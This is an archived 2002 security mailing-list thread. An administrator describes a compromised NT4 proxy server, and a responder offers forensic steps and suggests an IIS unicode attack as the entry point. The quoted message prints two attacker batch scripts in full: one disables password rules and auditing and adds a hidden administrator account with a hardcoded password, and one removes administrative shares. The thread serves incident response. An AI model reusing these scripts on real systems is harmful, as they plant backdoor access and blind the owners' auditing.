Hello, well, i would say that you've probably been hacked in order for the warez scene to distribute some stuff..... 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility Routine), and _zoLibr.dll and you'are probably running a Serv-U ftp server, doing a "netstat -an" should list all connections of the machine, where you should see if some more services than needed are running. And check for some *.rar, *.zip, if you are distributing warez you should find some Gb of those somewhere. Other's files have been renamed in order to atempt to obfuscate the real files usage. Bet you are also hosting kind of iroffer (an IRC bot, doing XDCC serving). To be sure of that, you can grab the file http://linux20368.dn.net/protools/files/utilities/fi.zip (this is a exe file identifier, he will identify the packer if he know it) and see what he report for each file you've found. Most probably, files are packed, a good bet would be UPX. Grab it from the main web site, and you may be able to unpack the files using the command upx -d <new_dumped_exe> from them you can take the files in any hexeditor/disassembler in order to find a way to identify the product. File properties may be sufficient for this. Once you've done that, you should have a good idea of what have been installed, in wich order, the last point is to find out how at first they came in Are you running an IIS on your proxy ? (\scripts\sample\ ) if so you've probably been hit by an unicode attack. Search for the following pattern in your proxy log file : "cmd.exe" or "/dir+c" (this is the usual vuln test). And if you found some installed stuff like FTP server, bots, and found tracks of attack in your log then a good bet would be that the attack have been successful,..... Hope this help Regards P.Girard P.S. You should definitively remove the sample script folder from a production computter. Not a good idea to keep them. You should also try the Microsoft Lockdown tools, that does a good job securing IIS.... > -----Message d'origine----- > De: Mike Cain [SMTP:mikecat_private] > Date: lundi, 18. novembre 2002 15:01 > À: incidentsat_private > Objet: Proxy server hit... Any ideas? > > Well, I have had my first run-in with a hacker, or was it a virus? I'm > not 100% sure.. Guess I should start from the beginning... > > A days ago, I began to get user complaints on the slowness of the > internet. I figured it was mostly them just wanting something to > complain about, so I did what all crappy admins do, I ignored it. Well, > last night the box was rebooted after some software was updated. Today > people were complaining about how PAINFULLY slow the internet was, so I > looked at the proxy server. NT4 running proxy3. I know, there is newer > better stuff, but its what I have to work with. :) SO... I looked at the > processes and noticed the CPU hovering at 35-50%.. Way too high. So a > quick look at the process list showed two things that I didn't remember > needing to be there, win.exe and start.exe. Next move was to find them, > and they were in the winnt\system\ folder. What I also found odd was > that there were three new folders in that directory all created on the > 8th, NT, tools, and win. > > Here are the contents, respectively. > 1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a > backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll > (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup > > 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, > srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility > Routine), and _zoLibr.dll > > 3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, > x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll, > win.exe, x32.dll.bkup > > SO, anyone know what I have or what hit me? From looking at the sercure > and secure1 batch files, it looks like a root kit... But I'mm new at > this side of security I'mm aCiscoo guy...) > > Last thing, the logs show that the attacker was hitting the > \scripts\sample\ folder... Meaning I think he was trying to use the old > IIS Sample Scripts to execute local code... Not sure if he was > successful... > > Thanks in advance!! > > Mike Cain > CCNP/MCSE > > > Secure.bat = > @echo off > del temp > echo Compiling New Security Policy ... > echo [Version] >> temp > echo signature="$CHICAGO$" >> temp > echo Revision=1 >> temp > echo [Profile Description] >> temp > echo Description=Default Security Settings. (Windows 2000 Professional) > >> temp > echo [System Access] >> temp > echo MinimumPasswordAge = 0 >> temp > echo MaximumPasswordAge = 42 >> temp > echo MinimumPasswordLength = 0 >> temp > echo PasswordComplexity = 0 >> temp > echo PasswordHistorySize = 0 >> temp > echo LockoutBadCount = 0 >> temp > echo RequireLogonToChangePassword = 0 >> temp > echo ClearTextPassword = 0 >> temp > echo [Event Audit] >> temp > echo AuditSystemEvents = 0 >> temp > echo AuditLogonEvents = 0 >> temp > echo AuditObjectAccess = 0 >> temp > echo AuditPrivilegeUse = 0 >> temp > echo AuditPolicyChange = 0 >> temp > echo AuditAccountManage = 0 >> temp > echo AuditProcessTracking = 0 >> temp > echo AuditDSAccess = 0 >> temp > echo AuditAccountLogon = 0 >> temp > echo [Registry Values] >> temp > echo > machine\system\currentcontrolset\services\netlogon\parameters\signsecure > channel=4,1 >> temp > echo > machine\system\currentcontrolset\services\netlogon\parameters\sealsecure > channel=4,1 >> temp > echo > machine\system\currentcontrolset\services\netlogon\parameters\requirestr > ongkey=4,0 >> temp > echo > machine\system\currentcontrolset\services\netlogon\parameters\requiresig > norseal=4,0 >> temp > echo > machine\system\currentcontrolset\services\netlogon\parameters\disablepas > swordchange=4,0 >> temp > echo > machine\system\currentcontrolset\services\lanmanworkstation\parameters\r > equiresecuritysignature=4,0 >> temp > echo > machine\system\currentcontrolset\services\lanmanworkstation\parameters\e > nablesecuritysignature=4,1 >> temp > echo > machine\system\currentcontrolset\services\lanmanworkstation\parameters\e > nableplaintextpassword=4,0 >> temp > echo > machine\system\currentcontrolset\services\lanmanserver\parameters\requir > esecuritysignature=4,0 >> temp > echo > machine\system\currentcontrolset\services\lanmanserver\parameters\enable > securitysignature=4,0 >> temp > echo > machine\system\currentcontrolset\services\lanmanserver\parameters\enable > forcedlogoff=4,1 >> temp > echo > machine\system\currentcontrolset\services\lanmanserver\parameters\autodi > sconnect=4,15 >> temp > echo machine\system\currentcontrolset\control\session > manager\protectionmode=4,1 >> temp > echo machine\system\currentcontrolset\control\session manager\memory > management\clearpagefileatshutdown=4,0 >> temp > echo machine\system\currentcontrolset\control\print\providers\lanman > print services\servers\addprinterdrivers=4,0 >> temp > echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 > >> temp > echo > machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> > temp > echo > machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 > >> temp > echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 > >> temp > echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 > >> temp > echo > machine\software\microsoft\windows\currentversion\policies\system\shutdo > wnwithoutlogon=4,1 >> temp > echo > machine\software\microsoft\windows\currentversion\policies\system\legaln > oticetext=1, >> temp > echo > machine\software\microsoft\windows\currentversion\policies\system\legaln > oticecaption=1, >> temp > echo > machine\software\microsoft\windows\currentversion\policies\system\dontdi > splaylastusername=4,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\scremoveoption=1,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\allocatefloppies=1,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\allocatedasd=1,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\winlogon\allocatecdroms=1,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp > echo machine\software\microsoft\windows > nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp > echo [Privilege Rights] >> temp > echo seassignprimarytokenprivilege = >> temp > echo seauditprivilege = >> temp > echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp > echo sebatchlogonright = >> temp > echo sechangenotifyprivilege = > *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp > echo secreatepagefileprivilege = *S-1-5-32-544 >> temp > echo secreatepermanentprivilege = >> temp > echo secreatetokenprivilege = >> temp > echo sedebugprivilege = *S-1-5-32-544 >> temp > echo sedenybatchlogonright = >> temp > echo sedenyinteractivelogonright = >> temp > echo sedenynetworklogonright = >> temp > echo sedenyservicelogonright = >> temp > echo seenabledelegationprivilege = >> temp > echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp > echo seincreasequotaprivilege = *S-1-5-32-544 >> temp > echo seinteractivelogonright = > *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040 > 8961-1637723038-1801674531-501 >> temp > echo seloaddriverprivilege = *S-1-5-32-544 >> temp > echo selockmemoryprivilege = >> temp > echo semachineaccountprivilege = >> temp > echo senetworklogonright = %1 >> temp > echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> > temp > echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp > echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp > echo sesecurityprivilege = *S-1-5-32-544 >> temp > echo seservicelogonright = >> temp > echo seshutdownprivilege = > *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp > echo sesyncagentprivilege = >> temp > echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp > echo sesystemprofileprivilege = *S-1-5-32-544 >> temp > echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp > echo setakeownershipprivilege = *S-1-5-32-544 >> temp > echo setcbprivilege = >> temp > echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> > temp > echo Adding User %1 with the Password %2 ... > net user /add slash 971985 > echo Adding slash to the Local Administrator Group ... > net localgroup administrators slash /add > echo Loading New Security Policy ... > secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb > /CFG temp > echo System is now secure. > > > > Secure1.bat > > net share /delete C$ /y > net.deld > net share /delete D$ /y >> net.deld > net share /delete E$ /y >> net.deld > net share /delete F$ /y >> net.deld > net share /delete G$ /y >> net.deld > net share /delete H$ /y >> net.deld > net share /delete I$ /y >> net.deld > net share /delete J$ /y >> net.deld > net share /delete K$ /y >> net.deld > net share /delete L$ /y >> net.deld > net share /delete M$ /y >> net.deld > net share /delete N$ /y >> net.deld > net share /delete O$ /y >> net.deld > net share /delete P$ /y >> net.deld > net share /delete Q$ /y >> net.deld > net share /delete R$ /y >> net.deld > net share /delete S$ /y >> net.deld > net share /delete T$ /y >> net.deld > net share /delete U$ /y >> net.deld > net share /delete V$ /y >> net.deld > net share /delete W$ /y >> net.deld > net share /delete X$ /y >> net.deld > net share /delete Y$ /y >> net.deld > net share /delete Z$ /y >> net.deld > net share /delete ADMIN$ /y >> net.deld > #net share /delete IPC$ /y >> net.deld > del net.deld > > > > -------------------------------------------------------------------------- > -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Nov 21 2002 - 16:54:12 PST